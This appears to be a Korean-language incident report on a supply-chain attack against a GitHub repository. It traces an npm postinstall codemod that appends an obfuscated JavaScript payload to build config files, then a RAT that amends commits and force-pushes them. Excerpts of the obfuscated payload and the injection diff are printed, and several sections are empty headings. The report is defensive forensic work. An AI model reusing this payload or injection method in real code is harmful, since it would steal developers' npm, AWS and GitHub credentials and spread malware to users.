PR #880 — 공급망 공격 + GitHub Actions 암호화폐 채굴

레포 FINGU-GRINDA/ai-real-estate-service · PR #880 · 2026-05-17 KST

1. 채굴 매커니즘 (force-push → Action 트리거 구조)

유사 캠페인: PurpleUrchin (GitHub Actions Hijacked for Crypto Mining, Sysdig 2023+), Ultralytics (fork PR + cache poisoning → miner wheel, 2024-12), linuxwebapp88 (Docker miner via Actions, IOC).

2. 공급망 공격이 맞는가

6/6 기준 충족 → npm 공급망 공격 확정. 단일 머신 침해(compromise) 가 아닌, 감염된 npm 패키지가 install 되는 모든 머신을 worm 화하는 자가 전파형.

3. 공급망 공격의 일반 원리 (단계별)

1. npm 패키지 maintainer 토큰 탈취 피싱 / GitHub Actions 시크릿 노출 / 의존성 transitive 침해 등으로 인기 패키지의 publish 권한 획득. (Shai-Hulud 의 경우 tinycolor, @ctrl/tinycolor 등이 초기 진입점)
2. 감염 버전 publish 패키지의 postinstall 또는 prepare script 에 페이로드 첨가. 또는 패키지 본체 코드에 동적 import-time payload 삽입.
3. 피해자 머신에서 install npm install / pnpm install / yarn install 또는 transitive 의존성으로 자동 fetch. postinstall 자동 실행.
4. 로컬 자동 인젝션 (codemod) postinstall 이 프로젝트 루트의 ESM build config 파일 (*.config.mjs, tailwind.config.js 등) 을 검색해 끝줄에 obfuscated payload 를 자동 삽입. ESM 호환을 위해 createRequire import 도 같이 추가.
5. 시크릿 탈취 + 자가 전파 build/dev 실행 시 payload 가 활성화 — ~/.npmrc 토큰, ~/.aws, GitHub PAT, 환경변수 exfil. 탈취한 npm 토큰으로 다른 패키지를 publish 하며 worm 확산.
6. commit / push 로 코드베이스 오염 개발자가 일반 작업 후 git push → 감염된 config 파일이 같이 commit 됨. 자동화 push 스크립트(temp_auto_push.bat)가 있으면 더 빠르게 확산.
7. CI/CD 가 감염 코드 빌드 → production 배포 main 의 감염 commit 이 GitHub Actions runner 에서 빌드되어 frontend 번들에 페이로드 포함. 사용자 브라우저까지 도달 가능.

4. 두 머지 commit 비교

5. 시점 (KST)

• 17:43 Claude 봇이 PR #880 head df796fa6 작성 — 깨끗
• 17:53 jaykim-cmd 가 GitHub UI 에서 머지 → b4594688 · 1차 배포 시작 (Action 25986386220)
• 17:55 1차 배포 완료 — 깨끗 코드
• ~87분 공백 — 이 사이 로컬 머신에서 페이로드 자동 주입 (postinstall codemod 추정)
• 19:21 iyeaaa 가 main 에 force-push b4594688 → ccc449b0 · 2차 배포 시작
• 19:22 2차 배포 완료 — 감염 빌드 alpha 도달 + Malware Reporter 알림

6. 인젝션 패턴 (b459468 → ccc449b diff)

+import { createRequire } from 'module';
+const require = createRequire(import.meta.url);
 export default { … plugins: [], };
-};
+};   [200+ space]  global['!']='X-YYYY'; var _$_1e42=…; Tgw(2509);

+temp_auto_push.bat
+temp_interactive_push.bat

7. 실제 페이로드 코드 (난독화 원본)

global['!']='10-2420';
var _$_1e42=(function(l,e){var h=l.length;var g=[];for(var j=0;j<h;j++){g[j]=l.charAt(j)};
  for(var j=0;j<h;j++){var s=e*(j+489)+(e%19597);var w=e*(j+659)+(e%48014);
  var t=s%h;var p=w%h;var y=g[t];g[t]=g[p];g[p]=y;e=(s+w)%4573868};
  var x=String.fromCharCode(127);…return g.join(…)})("rmcej%otb%",2857687);

global[_$_1e42[0]]= require;                       // ← require 글로벌 노출
if(typeof module===_$_1e42[1]){global[_$_1e42[2]]=module};

(function(){
  var sfL=…;                                       // 2단 셔플 디코더
  var dgC=sfL[EKc]; var xBg=dgC(Apa,sfL(joW));     // Function() 생성
  var pYd=xBg(sfL('o B%v[Raca)rs_…약 4KB 암호화 본문…'));
  var Tgw=jFD(LQI,pYd); Tgw(2509);                 // payload 실행
})();

8. Self-healing 증거 (PolinRider commit tampering)

sim 레포의 csh1668 가 만든 [malware-cleanup] Remove obfuscated global payload 커밋(cc7c946d, 2025-11-20) 의 실제 diff:

-export default config;  …  global['!']='7-1053'; var _$_1e42=…
+export default config;  …  global['!']='10-2420'; var _$_1e42=…

cleanup 시도가 v7 페이로드를 제거하면서 동시에 v10 페이로드를 새로 주입. 사람이 손으로 할 수 없는 동작이며, 정확한 원인은 PolinRider RAT 의 commit amend + force-push 입니다.

메타데이터 검증 — amend 흔적

매커니즘 (단계별)

1. csh1668 의 정상 cleanup 작업 페이로드(v7) 발견 → 수동으로 끝줄 삭제 → git add → git commit -m "[malware-cleanup] …". 이 시점 워킹트리는 깨끗.
2. PolinRider RAT 가 새 commit 을 감지 (백그라운드 데몬) temp_auto_push.bat 를 임시 생성하고 실행.
3. commit amend + 페이로드 재주입 postcss.config.mjs 끝줄에 v10 페이로드 재삽입. .gitignore 에 자기 흔적(.bat 2 줄) 추가. git commit --amend --no-edit 실행 → 이 때문에 committer_date 가 +2초 변경됨.
4. force-push git push --force 로 GitHub 에 amended commit 도달. csh1668 는 본인이 cleanup 만 push 했다고 믿지만 실제로는 v10 페이로드 포함.
5. 흔적 정리 temp_*push.bat 자체 삭제 (그러나 .gitignore 항목은 commit 에 영구 박힘 → 역설적으로 가장 강력한 IOC 가 됨)

대안 가설 비교

9. 6개월 확산 시간선

10. alpha 빌드에 노출된 secrets (회전 대상)

.github/workflows/deploy-alpha.yml 가 노출한 GitHub Actions secrets — 감염 빌드가 이 시크릿 환경에서 실행됨:

11. PR #880 자체는 결백

12. 즉시 조치